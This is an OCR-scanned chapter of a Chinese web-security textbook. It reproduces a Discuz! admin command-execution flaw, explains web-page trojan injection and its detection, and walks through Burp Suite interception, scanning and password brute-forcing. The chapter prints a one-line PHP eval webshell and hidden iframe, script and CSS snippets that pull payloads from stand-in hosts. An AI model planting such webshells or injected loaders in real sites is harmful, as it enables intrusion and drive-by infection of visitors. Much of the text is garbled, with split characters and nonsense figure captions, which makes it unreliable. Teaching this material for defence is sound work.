图 6-4 设置 专题 HTML 的 存放 目录 
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(3 ) 新 建 专题 
选择 门户 一 专题 管理 一 列表 一 创建 专题 ， 新 建 一 个 专题 : 专题 标题 可 以 任意 填写 内 容 ， 
静态 化 名 称 为 test， 在 附加 内 容 中 选择 “站 点 尾部 信息 ”， 然 后 提交 ， 如 图 6-5 所 示 。 





本 ev, Relzi, com/p-rtal. PhpTaod=portaLcpksc=T 
a 
i = [ee 
部 化 名 术 * [tex 
是 年 闪 过 这 加 是 加 百 
附加 内 容 口 其 吉 S 式 加 基点 民事 信息 








图 6-5 新 建 专题 


(4) 开启 专题 
开启 刚才 创建 的 专题 ， 然 后 找到 专题 的 操作 项 ， 单 击 “ 生 成 ”按钮 ， 如 图 6-6 所 示 。 


J El 






首页 全 向 及 面 内 容 用 户 国 国 论坛 如 和 凡生 水 运 会 应 用 工具 站 长 UCenter 
门 P 专题 管理 [+] 
专题 和 理 了 les 

ID [45 和 [| - 寺 坟 抽查 光 


8 妥 者 UID 6 刍 者 用 户 如 = 





TH 





十 时 专题 二 和 坟 化 各 各 Mi 人 本 时 间 HNL 册 作 


口 test te 这 二 2013-12-11 22:04 二 生机 各 揣 DI 村 和 了 








图 6-6 开启 专题 
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(5 ) 编辑 任务 计划 

开启 专题 之 后 ， 需 要 让 后 台 脚 本 执行 我 们 的 测试 代码 ， 因 此 需要 设置 任务 计划 。 

新 增 一 个 计划 任务 ， 设 置 运 行 时 间 为 “1”， 运 行 脚本 命令 为 “test.html”， 然 后 提交 。 

(6) 查看 木马 文件 

当 任务 计划 执行 完成 后 ， 我 们 可 以 在 根 目录 验证 是 否 存在 此 漏洞 ， 如 图 6-7 所 示 ， 成 功 
就 在 根 目录 生成 一 句 话 木 马 文件 m.php。 








自 和 贸 和 自 外 外 如 外 外 多 网 多 
iv onfi ee ie lp php res formphe gopphe hnephe 
.四 且 加 加 日 自 略 自 和 外 外 罗 


php 可 本 
ET Cay 格式 @) 查看 加 帮助 如 
php Beval($_POST[C]) :9> 





图 6-7 生成 一 句 话 木 马 文件 


当 此 漏洞 被 发 现 并 被 攻击 者 公开 后 ， 一 大 批示 及 时 更 新 的 网 站 都 遭 到 入 侵 。 如 图 6-8 所 
示 为 乌云 漏洞 库 中 的 搜索 列表 。 
当前 位 置 : 首页 > > 检索 结果 
搜索 关键 字 : Discuz! 后 台 命 令 执行 ( 共 25197 条 记录 ) 
Discuz! 3.1 后 台 命令 执行 


漏洞 类 型 : 命令 执行 作者 : 江南 的 鱼 


Discuz! X3.1 后 人 台 任 意 代码 执行 可 拿 shell 
漏洞 类 型 : 命令 执行 作者 : 江南 的 鱼 


Discuz!7.X 后 台 任意 代码 执行 
漏洞 类 型 : 命令 执行 作者 : vakin 


7k7k Discuz 论 坛 命令 执行 漏洞 
调 洞 类 型 : 系统 /服务 运 维 配 置 不 妆 作者 : 第 王 全 





图 6-8 乌云 漏洞 库 中 的 搜索 列表 
6.2.4 ”防御 方法 


CMS 通 用 漏洞 被 攻击 的 原因 是 大 量 网 站 使 用 同一 个 CMS， 而 CMS 本 身 存在 漏洞 ， 于 是 
大 量 的 网 站 便 存在 安全 风险 。 本 节 介 绍 3 种 CMS 漏 洞 的 防范 方法 :及 时 更 新 系统 版 本 、 删 除 
指纹 特征 和 关闭 写 入 权限 。 通 过 这 3 种 方法 ， 可 以 在 大 部 分 情况 下 避免 CMS 有 漏洞 时 被 攻击 
者 攻击 。 
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1. 及 时 更 新 系统 版 本 


因 CMS 通用 漏洞 被 入 侵 的 网 站 ， 通 常情 况 下 是 因为 使 用 的 CMS 漏洞 被 攻击 者 发 现 ， 而 
搭建 的 网 站 又 没有 及 时 更 新 网 站 源码 导致 的 。CMS 高 危 漏洞 一 旦 被 公开 ， 通 常 CMS 的 厂商 
会 在 第 一 时 间 更 新 安全 补丁 。 当 CMS 厂商 发 布 安全 补丁 之 后 ， 需 要 及 时 更 新 ， 切 不 可 掩 耳 盗 
铃 , 置之不理 。 目 前 , 绝 大 部 分 CMS 应 用 在 后 台 都 有 在 线 更 新 功能 ， 当 系统 检测 到 有 安全 更 
新 时 ， 单 击 “ 升 级 ”按钮 就 可 以 升级 。 


2. 删除 指纹 特征 


指纹 特征 是 指 同一 套 CMS 系 统 存在 很 多 相同 的 地 方 ， 比 如 有 相同 的 文件 结构 ， 在 页 面 
底部 通常 会 存在 LOGO 信 息 及 缓存 文件 存放 目录 , 因此 把 同一 类 CMS 系统 的 共同 点 称 为 指纹 
特征 。 当 攻击 者 找到 一 个 CMS 系统 的 漏洞 之 后 ， 便 会 通过 这 些 指 纹 特征 来 找到 更 多 的 同一 类 
CMS 系统 的 网 站 。 

既然 攻击 者 可 以 通过 指纹 特征 找到 更 多 网 站 ， 那 么 用 某 些 类 型 的 CMS 时 ， 我 们 就 可 以 
从 隐藏 CMS 指纹 特征 方面 入 手 ， 即 删除 或 改变 这 些 特征 ， 从 而 避免 被 一 些 程序 批量 扫描 。 比 
如 ， 一 些 具 有 漏洞 的 目录 ，Dedecms 中 的 plus、date 等 目录 可 以 修改 文件 目录 名 称 。 比 如 
Dedecms 之 前 出 现 过 搜索 漏洞 ， 扫 描 程 序 检测 的 是 文件 search.php 是 否 存 在 ， 当 存在 时 ， 攻 击 
者 就 会 发 现 此 系统 是 Dedecms 系 统 ， 如 果 我 们 把 文件 search.php 改 成 sphp， 也 是 可 以 运行 的 ， 
而 且 不 会 被 攻击 的 扫描 程序 所 发 现 。 


3. 关闭 写 入 权限 


前 面 提 到 写 入 权限 的 危害 , 攻击 者 入 侵 网 站 之 后 通常 会 留 下 一 个 木马 文件 ， 留 下 木马 文 
件 后 就 可 以 得 到 WebShell 权 限 ， 而 这 个 木马 文件 有 可 能 是 文件 上 传 上 来 的 ， 也 有 可 能 是 通过 
某 些 缓存 文件 生成 的 ， 如 本 章 的 漏洞 案例 ， 而 攻击 者 要 想 留 下 一 个 木马 文件 到 服务 器 中 ， 必 
须要 有 此 目录 的 写 入 权限 才 可 以 执行 。 

因此 ， 笔 者 建议 ， 如 果 确 认 网 站 不 需要 写 入 权限 ， 可 以 直接 把 网 站 写 入 权限 关闭 ， 需 要 
用 到 写 入 权限 的 时 候 再 开启 ， 这 样 昌 然 比较 麻烦 ， 但 是 效果 不 错 ， 没 有 写 入 权限 ， 攻 击 者 即 
使 进入 网 站 后 台 ， 也 无 法 得 到 WebShell 权 限 。 














网 页 挂 马 是 指 攻击 者 通过 某 种 手段 (比如 SQL 注 入 、XSS、 网 站 程序 0day 等 方法 ) 获得 
网 站 的 WebShell 权 限 。 利 用 获得 的 WebShell 修 改 网 站 页 面 的 内 容 ， 向 页 面 中 加 入 恶意 转向 代 
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码 。 攻 击 者 也 可 以 通过 弱 口 令 获得 服务 器 或 者 网 站 FTP， 然 后 直接 对 网 站 页 面 进行 修改 。 

网 页 挂 马 是 目前 黑色 产业 最 流行 的 一 种 网 页 引流 方式 , 攻击 者 通常 入 侵 政 府 、 教 育 机 构 
等 SEO 权重 比较 高 的 网 站 ， 通 过 修改 网 站 源 代 码 、 设 置 二 级 目录 反 向 代理 等 方式 实现 。 网 页 
劫持 可 以 分 为 服务 端 劫 持 、 客 户 端 劫持 、 百 度 快照 劫持 、 百 度 搜 索 劫 持 等 。 表 现形 式 可 以 是 
劫持 跳 转 ， 也 可 以 是 劫持 呈现 的 网 页 内 容 ， 或 者 是 当 用 户 访问 页 面 时 自动 下 载 木 马 病毒 。 本 
章节 将 向 读者 介绍 网 页 挂 马 的 原因 、 漏 洞 危害 以 及 解决 办 法 。 
6.3.1 挂 马 类 型 


网 页 挂 马 表现 的 特征 比较 少 ， 但 是 挂 马 的 方式 却 有 很 多 种 ， 常 见 的 有 iframe 标 签 挂 马 、 
script 标 签 挂 马 、 图 片 伪装 挂 马 、body 挂 马 等 方式 。 下 面 将 介绍 几 种 常见 的 挂 马 方式 。 


1. iframe 标签 挂 马 

iframe 是 HTML 常 见 的 一 种 标签 ,通常 是 一 个 页 面 需要 展示 另 一 个 页 面 的 内 容 ， 而 这 种 
用 法 正好 满足 攻击 者 网 页 挂 马 的 需求 ， 攻 击 者 会 在 网 页 上 增加 一 行 iframe 标 签 ， 通 过 src 属 性 
引入 另 一 个 页 面 。 下 面 的 例子 就 是 在 页 面 中 嵌入 一 个 挂 马 程序 : 

<iframe src=http://www.localhost.test/xss.html width=0 height=0></iframe> 

这 种 嵌入 语句 就 是 在 网 页 打开 的 时 候 , 同时 打开 另外 一 个 网 页 ， 当然 这 个 网 页 可 能 包含 
大 量 的 木马 ， 也 可 能 仅仅 是 为 了 骗取 广告 流量 。 

2. script 标签 挂 马 

script 标 签 的 src 属 性 可 以 引入 一 个 JS 文件 ， 攻 击 者 通过 script 标 签 来 实现 网 页 挂 马 ， 攻 击 
者 可 以 直接 通过 src 属 性 引入 JS 文件 ， 而 且 JS 文 件 为 明文 ,为 了 躲避 追查 ， 也 有 加 密 挂 马 的 形 
式 ， 形 式 各 异 、 千 差 万 别 ， 主 要 方式 有 HTML 文 件 挂 马 、JS 文 件 挂 马 、 变 形 JS 挂 马 ， 攻 击 者 
挂 马 的 具体 方式 如 下 : 


攻击 者 首先 会 上 传 一 个 带 有 页 面 劫持 代码 的 文件 (xss.html) 到 服务 器 中 ，xss.html 代 码 
如 下 : 


document.write("<div style='display:none'>") 
document.write("<iframe src=http://localhost/test.html width=0 height=0></iframe>") 
document.write("</div>") 


在 上 传 xss.html 之 后 ， 攻 击 者 会 青 次 在 网 站 原 有 的 页 面 中 添加 script 标 签 来 引入 xss.html 
文件 ， 代 码 如 下 : 


<script sre=xss.html></scrip> 
从 上 面 的 代码 可 以 看 出 ， 用 户 访问 网 站 后 会 执行 script 标 签 ， 这 个 标签 会 加 载 一 个 
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xss.html 文 件 ， 而 xss.html 文 件 里 面 的 内 容 实际 上 是 真正 的 劫持 代码 ， 攻 击 者 这 样 做 的 目的 是 
为 了 迷惑 网 站 管理 者 ， 让 其 找 不 到 劫持 代码 所 在 的 位 置 。 


3. CSS 标签 挂 马 


CSS 标 签 给 人 的 第 一 印象 是 用 来 做 样式 控制 的 ， 网 站 管理 员 很 少 能 想到 CSS 也 可 以 用 来 
挂 马 ， 所 以 攻击 者 通过 CSS 挂 马 也 很 常见 ， 攻 击 者 通常 利用 CSS 加 载 URL 地 址 功能 来 达到 挂 
马 的 目的 , 在 本 应 该 填写 URL 的 位 置 填写 一 段 JavaScript 代 码 ， 当 浏览 器 被 触发 时 ， 此 代码 将 
被 执行 。 在 下 面 的 代码 中 ， 攻 击 者 使 用 CSS 的 background-image: url 标 签 在 URL 位 置 填写 
JavaScript 代 码 。 

body {background-image: url(javascript:document.write("<script src=http://www.localhost.test/xss.js> 
script>"))} 
6.3.2” 挂 马 检 测 


笔者 此 前 接 到 一 位 开发 者 求助 , 通过 百度 搜索 后 , 打开 他 们 的 网 站 会 出 现 一 些 莫名 其 妙 
的 广告 ,有 时 候 甚至 直接 被 跳 转 到 另 一 个 网 站 ,而 直接 通过 域名 打开 则 没有 任何 异常 ， 后 来 
经 过 分 析 发 现 ， 动 持 代码 判断 了 页 面 来 源 ， 如 果 通 过 搜索 引擎 进入 ， 就 执行 动 持 代码 ， 否 则 
不 做 处 理 。 攻 击 者 这 样 做 的 目的 是 为 了 迷惑 网 站 管理 者 ,因为 网 站 管理 者 可 能 对 域名 比较 熟 
悉 ， 所 以 很 有 可 能 直接 打开 页 面 ， 而 不 会 通过 搜索 引擎 ， 直接 输入 域名 有 时 候 无 法 验证 是 否 
被 挂 马 。 下 面 将 介绍 几 种 判断 网 站 是 否 被 挂 马 的 方法 ， 主 要 有 搜索 引擎 检测 、 手 动 检测 、 在 
线 网 页 检测 。 


1. 搜索 引擎 检测 


搜索 引擎 每 天 都 在 收入 新 网 址 , 每 天 也 在 处 理 网 站 的 变更 , 同时 在 搜索 引擎 中 输入 的 时 
候 也 有 一 些 安全 检测 ， 因 此 可 以 利用 百度 、Google 等 搜索 引擎 搜索 需要 检测 的 网 站 ， 如 果 在 
页 面 中 提示 你 的 网 站 可 能 被 自 改 ， 那 么 很 有 可 能 已 经 被 挂 马 了 ， 如 图 6-9 所 示 。 


百度 网 址 安全 中 心 





百度 网 址 安全 中 心 提醒 你 
和 该 页 面 可 能 已 被 非法 算 改 ! 坦 看 详 傅 





您 的 财产 ， 信 息 安全 ， 建 议 您 译 值 访问 











图 6-9 检测 到 网 站 已 经 被 挂 马 
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如 果 检 测 到 网 站 有 木马 ， 搜 索 列 表 的 下 方 会 提示 该 网 站 有 不 安全 因素 。 
2. 手动 检测 


打开 你 需要 检测 的 网 站 后 , 右 击 查看 源 文件 , 看 看 网 页 关键 词 或 者 描述 中 是 否 有 明显 的 
“ 黄 赌 毒 ”等 关键 词 ， 根 据 网 页 挂 马 的 种 类 可 以 查看 是 否 中 了 木马 ， 如 图 6-10 所 示 。 















view-sourcehttp//www.nanshanchina.com 

















lele— 
{kle])p=p. replace (new 
9\\")»0 








)3>0 11s. 1(Wh\W") 0 








sr if |LANGLAGE baidu | Javascript sogou s0s0 |var uc |bing |yaho 


nde: 
ref Ihttp|103149|212|18|20171 [bcs ”1 ), 0, 人))</scripr 








图 6-10 ”网 页 已 经 被 挂 马 


从 图 6-10 中 源码 最 上 面 的 部 分 可 以 看 见 meta 标 签 内 有 很 多 被 编码 后 的 字符 , 这些 字符 被 
编码 的 原因 是 要 防止 访问 该 网 站 的 人 看 出 来 已 经 被 挂 马 了 。 


从 源码 下 面 script 标 签 内 的 代码 可 以 看 出 攻击 者 的 规则 : 当 用 户 从 搜索 引擎 进来 时 ， 就 
跳 转 页 面 ， 否 则 不 跳 转 。 正 是 因为 攻击 者 加 入 了 此 代码 ， 才 导致 不 同 渠 道 打 开 的 页 面 会 展现 
不 同 的 效果 ， 所 以 查看 源码 才 是 判断 是 否 被 挂 马 最 保险 的 方式 。 


3. 在 线 网 页 检测 


一 些 安全 厂商 会 提供 在 线 网 站 检测 服务 ， 比 如 360 网 站 安全 监测 ， 登 录 下 面 的 地 址 可 以 
看 到 检测 网 站 页 面 〈 见 图 6-11) : 


http://webscan.360.cn/index/checkwebsite?url=www.localhost.test 


使 用 360 的 网 页 检测 工具 可 以 在 一 定 程度 上 检测 目标 网 站 是 否 被 挂 马 ， 当 监测 到 被 挂 马 
后 ，360 会 告知 你 劫持 代码 的 位 置 ， 此 时 你 只 需要 找到 此 文件 ， 将 其 删除 即 可 。 
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该 网 站 安全 环 分 为 1 生前 慈寺 ， 不 能 代 到 
县 近 的 安全 术 沈 建议 委 新 检 到 


以 100. 


实 全 坟 曙 去 全 天 届时 间 : 1 年 前 





网 站 安全 泼洒 
vw 


粤 候 或 区 诈 网 站 监控 
”区 
挂 马 或 愁 意 网 站 监控 
”下 过 


黑 宫 基 改 网 站 监控 


党 


网 站 散 感 内 容 监控 
”正常 








图 6-11 360 安全 监测 网 页 
6.3.3 小结 


网 页 挂 马 也 叫 网 页 劫持 ， 按 被 挂 马 网 站 过 往 的 特点 来 看 ,出 现 网 页 挂 马 的 网 站 大 部 分 是 
一 些小 型 的 门户 网 站 ， 这 种 类 型 的 网 站 很 少 有 管理 员 维护 ， 甚 至 没有 人 维护 。 而 大 型 网 站 如 
果 被 劫持 ， 通 常 很 快 会 被 管理 员 知 晓 ， 很 快 就 能 得 到 修复 。 

对 于 缺少 维护 的 网 站 ， 笔 者 建议 可 以 使 用 一 些 安全 厂商 的 云 防火 墙 以 及 网 页 监控 功能 ， 
这 样 可 以 很 大 程度 减少 系统 被 攻击 以 及 被 挂 马 后 也 得 不 到 反馈 , 国内 目前 免费 的 云 防火 墙 有 
“360 网 站 安全 卫士 ”“ 百 度 云 加 速 ”， 当 然 还 有 更 多 付费 厂商 ， 比 如 阿里 云 的“ 云 盾 ”以 
及 知道 创 宇 的 众多 安全 产品 。 








.6.4 Burp Suite 


Burp Suite 是 一 款 使 用 Java 编 写 的 、 用 于 Web 安 全 审计 与 扫描 的 套件 , 集成 了 很 多 实用 的 
小 工具 ， 以 完成 HTTP 请 求 的 转发 、 修 改 、 扫 描 等 ， 同 时 这 些小 工具 之 间 还 可 以 互相 协作 ， 
在 Burp Suite 框 架 下 进行 各 种 强大 的 、 可 订 制 的 攻击 /扫描 方案 。 安 全 人 员 可 以 借用 它 进行 半 
自动 网 络 安全 审计 ,开发 人 员 也 可 以 使 用 它 的 扫描 工具 进行 网 站 压力 测试 与 攻击 测试 ， 以 检 
测 Web 应 用 的 安全 问题 。 

本 节 主 要 讲解 Burp Suite 常 见 的 功能 ， 包 括 拦截 数据 包 、 修 改 数据 包 、 页 面 链接 抓 取 、 
自动 化 挖掘 、 暴 力 破 解 5 部 分 。Burp Suite 的 功能 还 有 很 多 , 这 里 只 介绍 几 种 经 常用 到 的 功能 ， 
建议 读者 下 载 后 更 加 深入 地 学 习 体验 。 
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Burp Suite 是 基于 Java 开 发 的 ， 所 以 需要 安装 Java 环 境 才 可 以 运行 ,而 Burp Suite Pro 是 一 
个 收费 的 版 本 ， 功 能 相对 来 说 更 加 完整 ， 初 学 者 可 尝试 使 用 Burp Suite Free 免 费 版 本 。 


6.4.1 ”拦截 数据 包 


在 做 Web 安 全 测试 时 ， 经 常 需要 用 工具 抓 取 数 据 包 ， 通 过 数据 包 来 分 析出 可 能 存在 的 漏 
洞 , Burp Suite 是 一 个 经 常用 来 抓 包 的 工具 , 因为 是 基于 Java 语 言 开发 出 来 的 , 所 以 Burp Suite 
是 一 个 跨 平台 软件 ， 能 同时 支持 Windows、Mac、Linux 平 台 。 当 我 们 启动 Burp Suite 后 ， 它 
会 自动 创建 一 个 代理 服务 , 我 们 只 需要 把 浏览 器 的 代理 地 址 设置 为 127.0.0.1:8080 即 可 ,如 图 
6-12 所 示 。 





代理 服务 器 


JITP 代理 :127.0.0.1 


TPS 代 理 


SOCIS 代 理 
SOCIS4 ®) sockss 





图 6-12 浏览 器 代理 设置 


设置 浏览 器 代理 后 , 通过 浏览 器 随意 打开 一 个 HTTP 网 址 会 发 现 一 直 在 加 载 中 , 回 到 Burp 
Suite 界 面 ， 切 换 到 Proxy 选 项 卡 下 ， 可 以 看 到 刚才 请 求 的 数据 包 已 经 被 拦截 下 来 ， 并 且 有 4 
个 操作 按钮 ，Forward 允 许 通 行 ，Drop 拦 截 数 据 包 ，Intercept is on 表示 是 否 默 认 拦 截 ，Action 
用 于 更 多 操作 ， 如 图 6-13 所 示 。 


机 Burp Suite professional v1.7.17 - Temporary Project - licensed to Larry Lau 





Burp Intruder Repeater Window Hegp 


























acdE0gddct161501325459; pHDSESSID<cavr7dqce4515amaophbSb0js0e0， 
pr 


502532713,1504620413; Ba_1l 5S4E11a843ezft0BBec7=625=1504620413 








图 6-13 ”拦截 到 的 HTTP 数据 包 
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(1) 这 里 选择 Forward 人 允许 数 据 包 通 过 ， 再 回 到 浏览 器 中 ， 发 现 页 面 已 经 打开 。 

(2) 再 次 访问 一 个 页 面 , 拦截 到 数据 包 之 后 , 选择 Drop, 发 现 浏览 器 提示 页 面 无 法 打开 。 

(3) 再 次 拦截 一 个 数据 包 ， 单 击 Action 按 钮 ， 发 现 有 很 多 可 选项 ， 可 以 暂时 不 用 操作 ， 
后 面 会 讲 到 怎么 使 用 。 

(4) 单 击 Intercept is on， 再 去 浏览 器 访问 任意 网 址 ， 发 现 都 是 可 以 访问 的 ， 所 有 的 请 
求 都 默认 允许 通行 ， 如何 证 明 数 据 包 走 了 代理 呢 ? 只 需要 在 Burp Suite 的 HTTP history 选 项 卡 
中 看 是 否 有 HTTP 的 请 求 记录 ， 如 果 走 了 代理 ， 所 有 的 HTTP 数 据 包 都 会 被 Burp Suite 记 录 
下 来 。 

如 图 6-14 所 示 ， 可 以 在 数据 包 中 看 见 所 有 请 求 信息 ， 比 如 请 求 方法 为 POST、 请 求 URI 
为 “/userlogin.html”、 提 交 的 数据 username 值 为 “username” 等 。 


本 Burp Suite Profeccional v1.7.26 - Temporary Project - licensed to Lamy 
Burp twin Bapeato Won ba 
[Tee | Pro | peer Some | www | Fopvator | Serancor | Oocooe | cmpaw | Eotonaw | Propet optone Uo optore [At | 



























































[rtercept WobSockats hetory | ophons | 
































































Fiter Hiding CSS, image ard general binary content | 图 
Host | Method | URL | Pamams | Edted |Stotus | Length | MIME LExtension | Te 
ww 丁 = 
3 htpJanrerten com GET /arconico 目 B20 MM em 
4 hpyicm bowsetqqcom GET /mewabw quany nowisae=70 国 日 20 400 JsoN 
http /icm browset qq com GET se= [4 国 20 JSON 
6 GET E [' 200 19190 HTML Sng 
7 SET 加 口 现 15 
3 GET 国 四 30 15 
9 MPlkm bowmer qcom 。 GET 国 国 2 15 
10 httpVcm browserqqcom GET 国 国 304 175 
4。 htpyoxmngcom GET 书目 HM io em 
ET /newiab /ow quory WII DOR -PET mon oy eri HTP 
00;WON6 AppleNebxiMVS3736 (CHTML like Gecke) Chrome/5302785 104 Safarys3736 | 
014400 








Dmatches 





图 6-14 HTTP 请 求 历史 记录 


6.4.2 ”修改 数据 包 


很 多 时 候 , 攻击 者 会 反复 提交 一 个 数据 包 ， 比 如 在 测试 验证 码 绕 过 的 时 候 ， 需 要 判断 验 
证 码 验证 后 是 否 会 失效 ， 再 比如 攻击 者 想 修改 数据 包 直 接 发 送 ， 而 不 经 过 浏览 器 ， 就 可 以 用 
到 Burp Suite 的 Repeater 功 能 。 

在 Burp Suite 的 Repeater 界 面 可 以 任意 编辑 数据 包 ， 如 图 6-15 所 示 ， 数 据 包 中 的 参数 部 分 
通常 在 未 尾 ， 对 password 的 参数 值 进行 修改 ， 单 击 Go 按钮 ， 发 现 最 右边 的 Response 会 返回 请 
求 的 结果 ， 还 可 以 再 次 编辑 。 是 否 发 现 Repeater 的 功能 非常 方便 ? 用 这 个 功能 来 调试 数据 相 
比 通 过 浏览 器 的 UI 界 面 调 试 会 快 得 多 。 


198 


第 6 章 其 他 Web 安全 主题 


操作 步骤 如 下 : 


Do 在 拦截 的 数据 包 中 单 击 Action 一 Send to repeater。 
CI02 修改 数据 包 中 的 任意 一 个 字符 。 

C03 单 击 Go 按钮 。 

(304 在 最 右边 的 Response 中 查看 返回 结果 。 


如 图 6-15 所 示 ， 数 据 包 在 左 侧 的 Request 下 方 依然 包含 完整 的 HTTP 请 求 信息 ， 不 过 在 此 
处 我 们 可 以 修改 请 求 信息 ， 比 如 提交 的 参数 password 的 值 原 本 是 password， 当 更 改 为 “test” 
时 ， 再 单 击 Go 按钮 之 后 ， 返 回 的 结果 可 能 就 和 之 前 的 内 容 不 一 致 了 ， 因 为 这 个 位 置 可 以 快 
速 修改 数据 包 ， 所 以 攻击 者 通常 使 用 此 处 辅助 验证 安全 问题 。 
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图 6-15 ”修改 数据 包 功 能 界面 


6.4.3 ”页 面 链接 抓 取 


Burp Suite 可 以 根据 页 面 返回 的 HTML 内 容 分 析出 有 哪些 A 链 接地 址 , 并 对 这 些 链接 地 址 
再 次 怜 取 ， 最 后 分 析出 网 站 的 完整 目录 结构 ， 包 含 资源 文件 甚至 是 后 端 框架 的 版 本 。 有 了 这 
些 信 息 之 后 ， 攻 击 者 可 以 更 加 了 解 网 站 的 组 成 ， 比 如 哪些 地 方 可 能 存在 注入 、 该 框架 之 前 是 
否 有 爆 出 过 历史 漏洞 ， 因 此 页 面 链接 抓 取 对 于 攻击 者 来 说 是 一 个 重要 的 功能 。 下 面 将 介绍 
Burp Suite 抓 取 网 站 链接 的 操作 方法 。 


(1) 打开 一 个 网 页 拦截 数据 包 。 
(2) 单 击 Action 按 钮 选择 Send to spider。 
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(3) 切换 到 Spider 中 查看 扫描 过 程 。 
如 图 6-16 所 示 代 表 Burp Suite 正 在 进行 扫描 。 


蔽 Burp Suite professional v1.7.17 - Temporary Project - licensed to Larry Lau 一 口 X 


Burp Intruder Repeater Wndow Hep 














图 Spider Sous 


Use these settings to moniaor and control Burp Spider To begin spidering browse to the target application, then right-cick one or more nodes in the target site map, and choose 
“Spider this host / branch” 


Spier is running Clear queues 


Requests made; 4 
Bytes transferred: 4795 
Requests queued: 0 
Forms queued 0 


Spider Scope 


© Use suae scope [defined in Target tab] 
© Use custom scope 


回 世 








图 6-16 Burp Suite 正在 进行 扫描 





当 扫 描 完成 后 ， 可 以 切换 回 Target 选 项 卡 ， 在 选项 卡 中 找到 刚才 扫描 的 域名 ， 展 开 后 将 


能 看 到 网 站 下 的 目录 结构 。 如 图 6-17 所 示 为 扫描 后 的 结果 ， 左 侧 可 以 展开 目录 。 
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图 6-17 Burp Suite 的 Target 选项 卡 界面 
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在 扫描 交 结 果 界 面 的 右 侧 可 以 看 到 红色 的 感叹 号 和 黄色 的 感叹 号 , 这 些 代表 在 爬虫 过 程 
中 发 现 可 能 存在 的 问题 ， 颜 色 越 深 ( 偏 红 色 ) 代表 危害 等 级 越 高 ， 不 过 需要 注意 这 只 是 Burp 
Suite 的 推测 ， 不 能 直接 用 来 作为 判断 是 否 有 漏洞 的 依据 ， 因 为 很 有 可 能 是 误 报 。 
6.4.4 自动 化 挖掘 

Burp Suite 提 供 自动 化 挖掘 漏洞 功能 ， 只 需要 拦截 一 个 数据 包 ，Burp Suite 就 可 以 自动 完 
成 安全 测试 ，Burp Suite 会 通过 GET、POST、COOKIE 等 请 求 方式 测试 SQL 注入 、XSS、 文 
件 包含 等 漏洞 。 

操作 方法 如 下 : 

(1) 抓 取 数 据 包 。 

(2) 单 击 Action 一 Do an active scan。 

(3) 切换 到 Scanner 选 项 卡 查看 扫描 过 程 。 

当 有 漏洞 时 ，issues 列 数字 会 增加 ， 当 发 现 高 危 漏洞 时 ， 颜 色 会 更 加 偏 深 红色 来 给 予 提 
醒 。 如 图 6-18 所 示 为 Burp Suite 正 在 扫描 中 。 


eurp Suite Professional v1.7.17 - Temporary Project - licensed to Larry_ Lau 一 口 其 





Burp Intruder Repeater Window Help 
Target | Proxy | Spider [Scannee | ntuder | Repeater | Sequencer | Decoder | comparer [ Extender | Project optons | User options | Alerts 

















| {save scoty [ Seangueue [ Lve scammng | ssue defnitons | optons | 
| host |uRL | Staus | ssues | Requests | Emors 
1 httpJfwww .2345.com 了 21% complete 298 





~ gg 人 | 


unning (1 active thread) 








图 6-18 Burp Suite 正在 自动 化 渗透 测试 
当 Burp Suite 渗 透 测 试 结束 后 ， 可 以 在 Target 选 项 卡 看 到 扫描 后 的 分 析 结 果 。 
6.4.5 ”暴力 破解 


假设 现在 攻击 者 想 登 录 一 个 后 台 ， 但 是 不 知道 后 台 的 密码 ， 这 个 时 候 攻 击 者 会 怎么 做 
呢 ? 如 果 手 动 一 个 个 密码 去 尝试 ， 效 率 非 常 低下 ， 可 能 永远 也 没有 办 法 猜测 出 来 。 此 时 攻击 
者 通常 会 借助 Burp Suite 的 intuder 来 暴力 测试 , 攻击 者 对 第 一 个 请 求 抓 包 后 , 可 以 选择 密码 字 
段 进行 暴力 测试 ， 反 复 提 交 数 据 ， 每 一 次 请 求 的 密码 值 都 不 一 样 ， 直 到 遇 到 正确 的 值 。 
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具体 方法 如 下 : 
(1) 拦截 数据 包 。 
(2) 单 击 Action 一 Send intuder。 
(3) 选中 需要 暴力 破解 的 参数 值 。 
(4) 在 Payloads 选 项 卡 下 配置 暴力 破解 的 规则 。 
(5) 单 击 Start Attack 按 钮 开始 暴力 破解 。 





如 图 6-19 所 示 是 进行 暴力 破解 的 界面 , 在 该 界面 中 可 以 查看 数据 包 , 也 可 以 修改 数据 包 ， 
此 处 选择 使 用 密码 字段 来 作为 暴力 破解 入 口 。 


Burp Suite Professional v1.7.26 - Temporary Project - licensed to Larry Lau - Unlimited by mxcx@fosecvn 
Burp Intruder Repeater Window Help 


Target | Proxy | Spider | Scanner | mtruder | Repeater T Sequencer | Decoder comparer ] Exdender | Project options | User options | Alerts 

















oe ee | 


本 Payload Positions 








Configure the positions where payloads will be inserted into the base request The attack type determines the way in which 
payloads are assigned to payload positions - see help for full details 


Attack type. | Sniper 国 








DNT:1 

Referer: http:/ /ww.qsjianzhan.com/ 

Accept-Language: zh-CN,zh;q=0.8 

Cookie: _cfduid=d5f5f45adbSdd4e3c902c5378b60d26091513403930; 
PHPSESSID=ujenarsoeanqdd99k9d050lar6; Hm_Ivt_Sce67e744594611a843e2f088ec72625=1520742953; 
Hm._Ipvt_Sce67e744594611a843e2f088ec72625=1520761514 

Connection: close 


人 


username=idaxia&tpassword= 醒 本末 arememberme=foreverasubmit=%E7%99%88%ES5%8D%95| J 


[2] kd [| Bl) | pe » search te 0 matches 


1 payload position Length: 848 


























图 6-19 选择 使 用 密码 字段 来 作为 暴力 破解 入 口 


当 准 备 好 暴力 破解 的 字典 之 后 ， 攻 击 者 只 需要 单 击 “Start attack” 按 钮 就 可 以 进行 暴力 
破解 测试 。 如 图 6-20 所 示 是 启动 暴力 破解 之 后 的 界面 ， 在 界面 中 有 一 个 请 求 列表 ， 列 表 中 包 
含 序号 、Payload、Status、Error、Timeout、Length， 可 以 按照 任意 一 项 进行 排序 ， 笔 者 是 按 
照 Length 来 排序 的 ， 此 列 代表 服务 器 返回 文本 的 长 度 。 

可 以 想象 ,攻击 者 如 果 要 暴力 破解 一 个 账户 的 密码 ， 使 用 大 量 密码 进行 暴力 破解 ,但 是 
成 功 的 往往 只 有 一 个 ,服务 器 提示 成 功 的 信息 通常 和 提示 失败 的 信息 是 有 区 别 的 , 返回 的 内 
容 长 度 同样 是 有 区 别 的 ， 因 此 用 长 度 来 排序 就 比较 合理 了 。 
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图 6-20 ”暴力 破解 成 功 


图 6-20 中 按照 长 度 排序 后 ， 第 一 个 请 求 返回 的 内 容 长 度 为 1698， 而 其 他 内 容 则 是 1707， 
因此 第 一 个 请 求 会 让 攻击 者 关注 ， 当 单 击 后 ， 下 方 展示 的 信息 也 证 实 了 此 猜测 。 








